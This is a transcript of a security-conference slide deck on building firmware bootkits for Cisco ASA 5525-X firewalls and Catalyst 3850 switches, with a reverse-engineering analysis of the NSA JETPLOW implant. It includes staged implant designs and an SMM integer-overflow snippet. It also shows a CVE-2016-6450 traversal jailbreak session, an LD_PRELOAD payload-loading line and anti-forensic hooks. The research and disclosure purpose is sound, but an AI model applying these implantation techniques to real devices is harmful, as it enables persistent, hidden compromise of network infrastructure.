JETPLOW is dead. Long live the JETPLOW!

Transcript

1. JETPLOW is dead. Long live the JETPLOW! Roman Bazhin @nezlooy

   Maxim Malyutin @jesusfailed

2. Team lead and security researcher at Digital Security [email protected] @nezlooy

   Traineeship Program: [email protected] #whoami 2

3. • Intro • Cisco ASA 5525-X • Internals • Implantation

   • JETPLOW • Cisco Catalyst 3850 • Internals • Implantation • Summary Agenda 3

4. 4

5. Cisco ASA 5525-X Intro 5

6. NSA Ant Product Catalog Intro 6

7. NSA Ant Product Catalog / Restrictions Intro 7

8. Why is it so interesting? Intro 8

9. Why is it so interesting? Intro 9

10. Internals / Flash Сhips Cisco ASA 5525-X BIOS Flash NAND

    (boot:) 10

11. Internals / Booting Cisco ASA 5525-X * v. 9B2C109A *

    11

12. Internals / Boot images Cisco ASA 5525-X 12

13. 1. | asa823-k8 | 0x100000 | 2.6.29.6 | 2010-08-06 13:51:46

    2. | asa824-1-k8 | 0x100000 | 2.6.29.6 | 2010-12-18 00:02:38 ... | | | | 13. | asa825-smp-k8 | 0x200000 | 2.6.29.6 | 2011-05-20 23:33:17 ... | | | | 119. | asa932-2-smp-k8 | 0x1000000 | 3.10.19-WR6.0.0.2_standard | 2015-01-28 23:27:02 ... | | | | 122. | asa933-smp-k8 | 0x1000000 | 3.10.19-WR6.0.0.2_standard | 2015-04-22 16:35:34 123. | asa941-1-smp-k8 | 0x1000000 | 3.10.55-ltsi-WR6.0.0.13_standard | 2015-05-05 03:47:13 ... | | | | 142. | asa962-smp-k8 | 0x1000000 | 3.10.62-ltsi-WR6.0.0.27_standard | 2016-08-24 01:42:33 Internals / Boot images / Timeline Cisco ASA 5525-X 13

14. • No sign • The image can be reassembled with

    recalculation of hash • Hash is stored in the "BootLdr“ header (either md5, sha1, sha512) • You can build your own boot image • 0x14000 <- ROMMON TFTP Loader • 0x100000 <- ROMMON GRUB • Easily boot with Nintendo emulator Internals / Bringing arbitrary code / Custom boot images Cisco ASA 5525-X 14

15. • No sign • The image can be reassembled with

    recalculation of hash • Hash is stored in the "BootLdr“ header (either md5, sha1, sha512) • You can build your own boot image • 0x14000 <- ROMMON TFTP Loader • 0x100000 <- ROMMON GRUB • Easily boot with Nintendo emulator Internals / Bringing arbitrary code / Custom boot images Cisco ASA 5525-X 15

16. Internals / BIOS Flash Map Cisco ASA 5525-X 16

17. Internals / BIOS Flash Map / BIOS WE Cisco ASA

    5525-X BIOS Write Enable (BIOSWE) 0 = Only read cycles result in Firmware Hub I/F cycles. 1 = Access to the BIOS space is enabled for both read and write cycles. When this bit is written from a 0 to a 1 and BIOS Lock Enable (BLE) is also set, an SMI# is generated. This ensures that only SMI code can update BIOS. BIOS Lock Enable (BLE) 0 = Setting the BIOSWE will not cause SMIs. 1 = Enables setting the BIOSWE bit to cause SMIs. Once set, this bit can only be cleared by a PLTRST# http://www.intel.com/content/dam/doc/datasheet/io-controller-hub-9-datasheet.pdf 17

18. Internals / BIOS Flash Map / UEFI Tool Cisco ASA

    5525-X https://github.com/LongSoft/UEFITool 18

19. Safety rules Cisco ASA 5525-X BIOS Flash 19

20. Safety rules / Ignored Cisco ASA 5525-X 20

21. Implantation / Version 1 Cisco ASA 5525-X FirstLdr SecondLdr BootLdr

    Vmlinuz Rootfs ROMMON GRUB StubLdr startup Vmlinux do_execve lina 21

22. Implantation / Version 1 Cisco ASA 5525-X FirstLdr SecondLdr BootLdr

    Vmlinuz Rootfs ROMMON GRUB StubLdr startup Vmlinux do_execve lina 22

23. Implantation / Version 2 Cisco ASA 5525-X FirstLdr SecondLdr BootLdr

    Vmlinuz Rootfs ROMMON GRUB StubLdr startup Vmlinux do_execve lina 23

24. Implantation / Version 2 Cisco ASA 5525-X FirstLdr SecondLdr BootLdr

    Vmlinuz Rootfs ROMMON GRUB StubLdr startup Vmlinux do_execve lina 24

25. Implantation / Version 2 Cisco ASA 5525-X FirstLdr SecondLdr BootLdr

    Vmlinuz Rootfs ROMMON GRUB StubLdr startup Vmlinux do_execve lina 25

26. Implantation / Version 2 Cisco ASA 5525-X FirstLdr SecondLdr BootLdr

    Vmlinuz Rootfs ROMMON GRUB StubLdr startup Vmlinux do_execve lina 26

27. Implantation / Version 2 Cisco ASA 5525-X FirstLdr SecondLdr BootLdr

    Vmlinuz Rootfs ROMMON GRUB StubLdr startup Vmlinux do_execve lina ??? 27

28. Implantation / Version 2 Cisco ASA 5525-X FirstLdr SecondLdr BootLdr

    Vmlinuz Rootfs ROMMON GRUB StubLdr startup Vmlinux do_execve lina SMM 28

29. Implantation / Version 2 / Software SMI# Timer Cisco ASA

    5525-X Software SMI# Timer Enable (SWSMI_TMR_EN) 0 = Disable. Clearing the SWSMI_TMR_EN bit before the timer expires will reset the timer and the SMI# will not be generated. 1 = Starts Software SMI# Timer. When the SWSMI timer expires (the timeout period depends upon the SWSMI_RATE_SEL bit setting), SWSMI_TMR_STS is set and an SMI# is generated. SWSMI_TMR_EN stays set until cleared by software. Software SMI# Timer Rate Selector (SWSMI_RATE_SEL) 00 = 1.5 ms ± 0.6 ms 01 = 16 ms ± 4 ms 10 = 32 ms ± 4 ms 11 = 64 ms ± 4 ms http://www.intel.com/content/dam/doc/datasheet/io-controller-hub-9-datasheet.pdf 29

30. void __fastcall SMIFlashSMIHandler(void *DispatchHandle, EFI_SMM_SW_DISPATCH_CONTEXT *DispatchContext) { /* ... */

    SwSmiInputValue = DispatchContext->SwSmiInputValue; CpuSaveStateOffset = 0x2C8 * Cpu; LowBufferAddress = *(CpuSaveStateOffset + v9 + offsetof(EFI_SMM_CPU_STATE32, _EBX)); HighBufferAddress = Shl64(*(CpuSaveStateOffset + v9 + offsetof(EFI_SMM_CPU_STATE32, _ECX)), 32); v14 = (SwSmiInputValue - 0x20); pCommBuff = (LowBufferAddress + HighBufferAddress); switch (SwSmiInputValue) { /* ... */ case 0x21: ReadFlash(pCommBuff); break; /* ... */ } /* ... */ } Implantation / Version 2 / SMM / SMIFlash Cisco ASA 5525-X 30

31. void __fastcall SMIFlashSMIHandler(void *DispatchHandle, EFI_SMM_SW_DISPATCH_CONTEXT *DispatchContext) { /* ... */

    SwSmiInputValue = DispatchContext->SwSmiInputValue; CpuSaveStateOffset = 0x2C8 * Cpu; LowBufferAddress = *(CpuSaveStateOffset + v9 + offsetof(EFI_SMM_CPU_STATE32, _EBX)); HighBufferAddress = Shl64(*(CpuSaveStateOffset + v9 + offsetof(EFI_SMM_CPU_STATE32, _ECX)), 32); v14 = (SwSmiInputValue - 0x20); pCommBuff = (LowBufferAddress + HighBufferAddress); switch (SwSmiInputValue) { /* ... */ case 0x21: ReadFlash(pCommBuff); break; /* ... */ } /* ... */ } Implantation / Version 2 / SMM / SMIFlash Cisco ASA 5525-X 31

32. ; __int64 __fastcall ReadFlash(FUNC_BLOCK *pFuncBlock) ReadFlash proc near mov edx,

    [rcx+FUNC_BLOCK.BlockAddr] mov r8, [rcx+FUNC_BLOCK.BufAddr] xor r9d, r9d add edx, 0FFC00000h cmp [rcx+FUNC_BLOCK.BufSize], r9d jbe short loc_4003F3 loc_4003DD: mov al, [rdx] inc r9 inc rdx mov [r8], al mov eax, [rcx+FUNC_BLOCK.BufSize] inc r8 cmp r9, rax jb short loc_4003DD loc_4003F3: mov [rcx+FUNC_BLOCK.ErrorCode], 0 xor eax, eax retn ReadFlash endp Implantation / Version 2 / SMM /SMIFlash.ReadFlash Cisco ASA 5525-X 32

33. ; __int64 __fastcall ReadFlash(FUNC_BLOCK *pFuncBlock) ReadFlash proc near mov edx,

    [rcx+FUNC_BLOCK.BlockAddr] mov r8, [rcx+FUNC_BLOCK.BufAddr] xor r9d, r9d add edx, 0FFC00000h ; Integer Overflow here cmp [rcx+FUNC_BLOCK.BufSize], r9d jbe short loc_4003F3 loc_4003DD: mov al, [rdx] inc r9 inc rdx mov [r8], al mov eax, [rcx+FUNC_BLOCK.BufSize] inc r8 cmp r9, rax jb short loc_4003DD loc_4003F3: mov [rcx+FUNC_BLOCK.ErrorCode], 0 xor eax, eax retn ReadFlash endp Implantation / Version 2 / SMM /SMIFlash.ReadFlash Cisco ASA 5525-X 33

34. ; __int64 __fastcall ReadFlash(FUNC_BLOCK *pFuncBlock) ReadFlash proc near mov edx,

    [rcx+FUNC_BLOCK.BlockAddr] mov r8, [rcx+FUNC_BLOCK.BufAddr] xor r9d, r9d add edx, 0FFC00000h ; Integer Overflow here cmp [rcx+FUNC_BLOCK.BufSize], r9d jbe short loc_4003F3 loc_4003DD: mov al, [rdx] inc r9 inc rdx mov [r8], al mov eax, [rcx+FUNC_BLOCK.BufSize] inc r8 cmp r9, rax jb short loc_4003DD loc_4003F3: mov [rcx+FUNC_BLOCK.ErrorCode], 0 xor eax, eax retn ReadFlash endp Implantation / Version 2 / SMM /SMIFlash.ReadFlash Cisco ASA 5525-X Lenovo Security Advisory: LEN-4710 https://support.lenovo.com/us/en/product_security/len_4710 34

35. Stage 1  Relocate from BIOS Flash to RAM Stage

    2  Relocate from RAM to SMRAM Stage 3  Decrypt next stages Stage 4  Wipe used stages from RAM to hide the traces  SMM Timer  Check StubLdr  Extract Vmlinuz  Parser ELF and collect symbols  Wait kernel  Allocate dropper  Splice function `open_exec` Implantation / Version 2 / Stages Cisco ASA 5525-X Stage 5  Dropper Stage 6  Shim Stage 7  Payload 35

36. • Boot with custom evil image (local, remote and etc.)*

    • Examine platform configuration • Pass collected info back to attacker e.g. via SSH connection • Build stages • Infect • Cleanup • Reload the platform * PIC Implantation / Version 2 / Infection Cisco ASA 5525-X 36

37. Implantation / Version 2 / After infection Cisco ASA 5525-X

    37

38. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L ROMMON GRUB 38

39. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L ROMMON GRUB Stage 2 39

40. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L ROMMON GRUB Stage 2 Stage 3 40

41. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Stage 2 Stage 3 Stage 4 ROMMON GRUB 41

42. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Stage 2 Stage 3 Stage 4 ROMMON GRUB 42

43. Stage 4 Implantation / Version 2 / Cruise control Cisco

    ASA 5525-X t SMM R/P/L ROMMON GRUB BootLdr 43

44. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Stage 4 BootLdr StubLdr 44

45. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Stage 4 BootLdr StubLdr 45 Extracted copy of linux kernel

46. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Stage 4 BootLdr StubLdr Linux kernel 46

47. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Stage 4 StubLdr Linux kernel 47 BootLdr

48. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Linux kernel 48 Stage 4

49. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Linux kernel Stage 5 49 Stage 4

50. Linux kernel Implantation / Version 2 / Cruise control Cisco

    ASA 5525-X t SMM R/P/L Stage 4 Stage 5 Linux kernel 50

51. Linux kernel Implantation / Version 2 / Cruise control Cisco

    ASA 5525-X t SMM R/P/L Stage 4 Stage 5 Stage 6 Linux kernel 51

52. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Stage 6 Linux kernel Stage 7 52

53. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Stage 6 Linux kernel Stage 7 /asa/bin/lina 53

54. Implantation / Version 2 / Cruise control Cisco ASA 5525-X

    t SMM R/P/L Stage 6 Linux kernel Stage 7 /asa/bin/lina 54

55. The NSA Implant / If it quacks like a duck…

    JETPLOW 55

56. • BannanaDaiquiri 3.1.2* (BG3121) • ScreamingPlow 2.8 (SCP28) • Cisco

    ASA 5505 with ROMMON v. 10.0(12)13 • Boot image v. 8.3.1 (asa831-k8) • Custom evil engineering boot image The NSA Implant / Limitations of the research JETPLOW 56

57. • Assemble Keyed Flash Image for target • The image

    must be generated specifically for a target firewall with reference to some basic information about it (series, version ROMMON, etc.) • Load Keyed Flash Image and wait for remote connection • Customize the implant and start the infection process • Send implant to target • Install implant • Cleanup • Reload the platform The NSA Implant / Infection JETPLOW 57

58. <patch> <data src="inline" type="userarea">0</data> <!-- Assigned later --> <address>fff70000</address> <!--

    SECOND_USER_AREA_ADDRESS --> </patch> <patch> <data src="file">bin/asa5505/SCP28/asa5505_patch60000.bin</data> <address>fff60000</address> <!-- FIRST_CODE_AREA_ADDRESS --> </patch> <patch> <data src="inline" type="pbd">0</data> <!-- Assigned later --> <address>fff6df00</address> <!-- FIRST_USER_AREA_ADDRESS --> </patch> <patch> <data src="file">bin/asa5505/SCP28/asa5505_patchEC480.bin</data> <address>fffec480</address> <!-- SECOND_CODE_AREA_ADDRESS --> </patch> <patch> <data src="file">bin/asa5505/SCP28/asa5505_patchE18BF.bin</data> <address>fffe18bf</address> <!-- HOOK_ADDRESS --> </patch> The NSA Implant / Configuring / “my hovercraft is full of eels” JETPLOW Part of decrypted “asa5505_101213_install_SCP28.pif” 58

59. ; ; --- SECTION I --- ; allocb 0x008d6e94 rand

    0x00b978c0 freeb 0x008d7280 process_create 0x0010dbec open 0x00110368 process_suspend 0x0010ea9c ip_put 0x0047f670 process_sleep_for 0x0010f4e0 close 0x0011046c show_process 0x006f8ab0 atoip 0x00b8d928 cur_t 0x00db4510 memset 0x00b7b1d8 calc_ip_cksum 0x00482ea4 memmove 0x00b97a6c arp_loopkup 0x00484664 malloc_call_calloc 0x008d6b70 send_it 0x00481604 free 0x00b8319c arp_create 0x00486784 printf 0x0010fc70 get_hw_iface_2 0x0074148c ... ... ... ... The NSA Implant JETPLOW Part of “40086100.dat” 59

60. ; ; --- SECTION II --- ; HookLocation 0x005f6425 FlashClassAddr

    0x00000000 JmpLocation 0x005f90a6 CryptoDeviceAddr 0x00db7fd0 InterfaceAddr 0x00c866ac ArpTableAddrPtr 0x00c793a8 InterfaceLeng 0x000001b8 ArpTableLastPtr 0x00c793b0 IntSecurityOffset 0x1c NumInterfaces 0x00000000 IntNameOffset 0x188 IfaceStruct2 0x00000000 IntNumOffset 0x143 FlashFileInfoSizeOffset 0x00000018 IntVlanOffset 0x10 PIXFlashRmfileAddress 0x0035c30c IntIPOffset 0x20 FlashDirlistAddress 0x003e7b1c IntNetmaskOffset 0x24 FlashChmodAddress 0x003e7c40 ... ... ... ... The NSA Implant JETPLOW Part of “40086100.dat” 60

61. The NSA Implant / After infection / BIOS Flash Map

    JETPLOW 61

62. Implantation / Version 2 / Causes of SMI# Cisco ASA

    5525-X http://opensecuritytraining.info/IntroBIOS_files/Day1_07_Advanced x86 - BIOS and SMM Internals - SMM.pdf 62

63. Second Code Area First Code Area Linux Kernel Lina The

    NSA Implant / IDT Trick 63

64. Second Code Area First Code Area Linux Kernel Lina The

    NSA Implant / IDT Trick 64

65. First Code Area Linux Kernel Lina Second Code Area The

    NSA Implant / IDT Trick 65

66. First Code Area Linux Kernel Lina Second Code Area The

    NSA Implant / IDT Trick 66

67. First Code Area Second Code Area Linux Kernel Lina The

    NSA Implant / IDT Trick 67

68. First Code Area Second Code Area Linux Kernel Lina The

    NSA Implant / IDT Trick 68

69. First Code Area Second Code Area Linux Kernel Lina The

    NSA Implant / IDT Trick 69

70. First Code Area Second Code Area Linux Kernel Lina The

    NSA Implant / IDT Trick 70

71. Second Code Area First Code Area Linux Kernel Lina The

    NSA Implant / IDT Trick 71

72. First Code Area Second Code Area Linux Kernel Lina The

    NSA Implant / IDT Trick 72

73. First Code Area Second Code Area Linux Kernel Lina The

    NSA Implant / IDT Trick 73

74. First Code Area Linux Kernel Lina Second Code Area The

    NSA Implant / IDT Trick 74

75. • After reverse JETPLOW, we can notice that: • The

    authors have done a awesome job; • Implant supports a wide range of various hardware (PIX 701 – ASA 5505); • Well thought-out architecture of the latest versions; • The industrial approach. • Further readings: • https://dsec.ru/ipm-research-center/research/architecture_jetplow/ The NSA Implant / Conclusion JETPLOW 75

76. • After reverse JETPLOW, we can notice that: • The

    authors have done a awesome job; • Implant supports a wide range of various hardware (PIX 701 – ASA 5505); • Well thought-out architecture of the latest versions; • The industrial approach. • Further readings: • https://dsec.ru/ipm-research-center/research/architecture_jetplow/ • JETPLOW feedback: • E-mail: [email protected]. Phone Number: +1-301-688-6524 The NSA Implant / Conclusion JETPLOW 76

77. • BIOS Stealth • Hook BIOS R/W-code (SMIFlash) • Use

    Flash SPI SMI# Enable (FSMIE)* to hook HW/SW sequencing access to BIOS Flash • Anti ROMMON upgrade • FS Stealth • Hook `filp_open` and `filp_write` in kernel mode • Hook `open`, `fopen`, `access`, `stat` etc. in user space • … Anti-forensic / “Check the logs on the ASA firewall” Cisco ASA 5525-X 77

78. • Potentially implantation may be subject to: • Cisco official

    position: > This list of ASA hardware models provided do not support secure boot or hardware-based attestation of a digitally signed image. > Your scenario where a custom image could be booted and made persistent might be possible on the ASA hardware platforms which do not support secure boot or hardware-based attestation. Conclusion / It's not a bug, it's an undocumented feature Cisco ASA 5525-X ASA 5505 ASA 5510 ASA 5512-X ASA 5515-X ASA 5520 ASA 5540 ASA 5545-X ASA 5550 ASA 5555-X ASA 5580 ASA 5585-X 78

79. Cisco 3850 79

80. Cisco 3850 Internals 80

81. Internals / Flash Сhips Cisco 3850 NOR Flash NAND (sda)

    81

82. Internals / Booting Cisco 3850 Main process /usr/binos/bin/iosd RESET ROMMON

    SBL Linux Kernel Boot image on NAND Flash (boot:) NOR Flash FBL 0xBFC00000 0xBFC01000 0x80030000 0x80100000 82

83. Internals / Booting Cisco 3850 First Boot Loader (FBL): 1.

    RESET j start 2. init_boot_bus(), init_i2c_bus(), init_dram(), etc. 3. sw 0x0800C180 which translates to j sbl_entry @ 0x80030000 4. memcpy(sbl_entry + 4, sbl_text, …) 5. j sbl_entry Second Boot Loader (SBL): 6. expand_bundle(), verify_nova_pkg(), … 7. launch_kernel() 83

84. mtdparts=norda: 8m@0xbf40000(all) 1m@0(bs) 64k@0x100000(vb) 64k@0x110000(pb) 64k@0x120000(db) 6848k@0x130000(boot) 64k@0x7e0000(vb1) 64k@0x7f0000(rkey) Internals

    / NOR Flash Map Cisco 3850 84

85. Internals / Boot images Cisco 3850 Header TLVs Signature Packages

    Header TLVs Signature Files Type Length Value Offset Length Mode Name Bundle (.bin) Package TLV Types 22-25 85

86. Internals / Boot images Cisco 3850 Header TLVs Signature Packages

    Header TLVs Signature Files Type Length Value Offset Length Mode Name Bundle (.bin) Package TLV Types 22-25 Linux kernel Parts of file system 86

87. Internals / Bringing arbitrary code / Custom boot images Cisco

    3850 Header TLVs Signature Packages Header TLVs Signature Files Type Length Value Offset Length Mode Name Bundle (.bin) Package TLV Types 22-25 Linux kernel Parts of file system 87

88. // /usr/bin/unbundle // ... snprintf(&fullpath, "%s/%s", tmpdir, pkgname); fd =

    fopen(fullpath, "wb"); fwrite(fd, 1, pkgsize, pkgdata); fclose(fd); chmod(fullpath, pkgaccess); // ... Internals / Bringing arbitrary code / Custom boot images Cisco 3850 88

89. // /usr/bin/unbundle // ... snprintf(&fullpath, "%s/%s", tmpdir, pkgname); fd =

    fopen(fullpath, "wb"); fwrite(fd, 1, pkgsize, pkgdata); fclose(fd); chmod(fullpath, pkgaccess); // ... Internals / Bringing arbitrary code / Custom boot images Cisco 3850 89

90. // /usr/bin/unbundle // ... snprintf(&fullpath, "%s/%s", tmpdir, pkgname); // ../../usr/bin/FILE

    fd = fopen(fullpath, "wb"); fwrite(fd, 1, pkgsize, pkgdata); fclose(fd); chmod(fullpath, pkgaccess); // ... Internals / Bringing arbitrary code / Custom boot images Cisco 3850 90

91. // /usr/bin/unbundle // ... snprintf(&fullpath, "%s/%s", tmpdir, pkgname); // ../../usr/bin/FILE

    fd = fopen(fullpath, "wb"); fwrite(fd, 1, pkgsize, pkgdata); fclose(fd); chmod(fullpath, pkgaccess); // ... Internals / Bringing arbitrary code / Custom boot images Cisco 3850 Cisco Security Advisory: cisco-sa-20161115-iosxe https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161115-iosxe 91

92. Switch# request system shell Are you sure you want to

    continue? [y/n] y Challenge: c804288d2b32cef958a77...skip...465f633d51aeb4702daf7166b Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.): Implantation / Infection Cisco 3850 92

93. Switch# request system shell Are you sure you want to

    continue? [y/n] y Challenge: c804288d2b32cef958a77...skip...465f633d51aeb4702daf7166b Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.): Implantation / Infection Cisco 3850 /usr/bin/code_sign_verify_nova_pkg 93

94. Switch# request system shell Are you sure you want to

    continue? [y/n] y Challenge: c804288d2b32cef958a77...skip...465f633d51aeb4702daf7166b Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.): Implantation / Infection Cisco 3850 /usr/bin/code_sign_verify_nova_pkg /bin/true 94

95. Switch> en Switch# software expand file flash/:CVE-2016-6450.bin Preparing expand operation

    ... [1]: Expanding bundle usbflash0:CVE-2016-6450.bin [1]: Copying package files [1]: Package files copied [1]: Finished expanding bundle usbflash0:CVE-2016-6450.bin Switch# conf t Switch(config)# service internal Switch(config)# end ... Internals / Bringing arbitrary code / Jailbreak Cisco 3850 95

96. ... Switch# request system shell Are you sure you want

    to continue? [y/n] y Challenge: c804288d2b32cef958a5a47377...skip...465f633d51aeb4702daf7166b Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.): SUPER-SECRET-ENGINEERING-PASSWORD ********************************************************************** Activity within this shell can jeopardize the functioning of the system. Use this functionality only under supervision of Cisco Support. Logging to media is disabled since the media device bootflash: is not available. ********************************************************************** Terminal type 'network' unknown. Assuming vt100 [linux:/]$ uname -a Linux linux 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux Internals / Bringing arbitrary code / Jailbreak Cisco 3850 96

97. • Jailbreak (local, remote and etc.)* • Examine platform configuration

    • Pass collected info back to attacker e.g. via SSH connection • Build stages • Infect • Cleanup • Reload the platform * PIC Implantation / Infection Cisco 3850 97

98. Implantation / Infection Cisco 3850 1. Patch sw 0x800C180 sw

    0x8000004 Original: Patched: j sbl_start j s1_entry nop nop ... ... ; <- s1_entry ; @ 0xBFC14BF4 2. Store Stage 1 code just below j sbl_start start instruction 3. Store the rest of the implant in the free space at the end of the BS j sbl_start j s1_entry 98

99. mtdparts=norda: 8m@0xbf40000(all) 1m@0(bs) 64k@0x100000(vb) 64k@0x110000(pb) 64k@0x120000(db) 6848k@0x130000(boot) 64k@0x7e0000(vb1) 64k@0x7f0000(rkey) Implantation

    / NOR Flash Map / After infection Cisco 3850 99

100. • Stage 1 • Relocate Stage 2 code to RAM

     @ 0x80000000 • Splice launch_kernel() to take over control when the kernel code has been allocated • Stage 2 • Splice init_post() to take over control just before the kernel is ready to execute /sbin/init • Stage 3 • Use kmem_cache_alloc() to allocate memory for Stages 4 – 5 • Call kernel_thread() with threading procedure set to Stage 4 code • Stage 4 • Call kernel_execve() to move thread from kernel space to user space and run /bin/bash (which is Stage 5) • Stage 5 • bash –c eval “dd if=/dev/mtd0 of=/tmp/evil.so … && export LD_PRELOAD=/tmp/evil.so” Implantation / Cruise control Cisco 3850 100

101. • Anti-update • Hook `mtd_read` and `mtd_write` • Anti-logging •

     Hook `filp_open` and `filp_write` • … Anti-forensic Cisco 3850 101

102. • Potentially implantation may be subject to: • Cisco official

     position: > CVE-2016-6450 > Cisco IOS XE Software Directory Traversal Vulnerability > CVSS Score: Base 1.5, Temporal 1.2 • Little bit evil (up to 7.5) • Cisco Smart Install. Pentester’s opportunities Conclusion Cisco 3850 Cisco 5700 Series Wireless LAN Controllers Cisco Catalyst 4500E Series Switches Cisco Catalyst 4500X Series Switches Cisco Catalyst 3650 Series Switches 102

103. • Without hardware protection the bootkit development is not a

     rocket science; • Watch a defensive tool (like ASA firewall) become an offensive one; • Independent research; • More independent research; • Best practices just gives you an illusion of security. Summary 103

104. $$$ Mitigations 104

105. Thumbs up, reposts are welcome! Questions? 105